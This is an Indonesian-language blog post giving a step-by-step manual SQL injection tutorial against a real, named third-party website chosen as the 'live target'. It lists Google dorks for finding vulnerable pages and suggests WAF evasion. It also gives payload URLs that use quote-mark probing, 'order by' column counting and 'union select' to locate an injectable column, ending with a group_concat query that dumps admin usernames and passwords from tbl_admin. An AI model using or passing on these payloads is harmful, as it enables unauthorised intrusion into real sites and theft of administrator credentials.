statistics

Recent

Comment

Subscribe

Popular

Formulir Kontak

Nama

Email *

Pesan *

Paling Dilihat

Sql Injection Manual [Basic]

Tutorial SQL injection Manual


[+] dork google = 
projects.php?cat_id=
                             index.php?id= 
                             Sisanya Cari di mbah gugel , bejibun , atau kembangin sendiri
[+] hackbar = untuk permudah exploitasi
       Download  HACKBAR
[+] susu perawan dan kopi hangat

oke live target nya ini aja 
http://www.rubin-arch.co.il/projects.php?cat_id=5

1. check vulnnya pakai kutip atas ( ' ) 


[Image: RMRMp7h.png]

2. find ada berapa table menggunakan 
5 order by --
-5 order by 1--
5' order by 1--+

[Image: G1rc1d0.png]< Normal
[Image: IeS3haw.png]< error
http://www.rubin-arch.co.il/projects.php?cat_id=5 order by 6-- < Error
berarti ada 5 table di web itu Smile dan eksekusi sampai 5 aja /sebelum errornya


3.cari letak table yang di gunakan untuk eksekusi/mencari db nya
http://www.rubin-arch.co.il/projects.php?cat_id=5 union select 1,2,3,4,5-- <<< whats ? kagak muncul letaknya ? itu kurang di kasih susu perawan 
tambahin ( - ) strip di depan angka

[Image: pxJjCvC.png] < ada ni nomor 3 

4. langsung aja di dios Tongue gak perlu cari2 table dan column yang ribet 
apa itu dios ? dump in one shop Tongue sekali tusuk langsung masuk
[Image: bPEOCOD.png]< ini ss nya free pakai yang mana aja diosnya
asal jangan WAF Tongue klo waf untuk website yang terdeteksi waf lah 
macam forbidden , not acceptable , denied ahaha

5. itu sudah jelas letak user dan pass adminnya ada di tbl_admin
langsung inject bray

http://www.rubin-arch.co.il/projects.php?cat_id=-5 union select 1,2,group_concat(user_name,0x7c,user_pass),4,5 from tbl_admin-- 

terettereteret ketemukan 

[Image: IKtgssj.png]

so simple ? 


Terima kasih kepada HumanEdoTensei atas tutorial nya ini :D
Menasihati diri sendiri merupakan salah satu tugas yang tersulit. Karena yang akan melawan nasihat tersebut, adalah diri sendiri.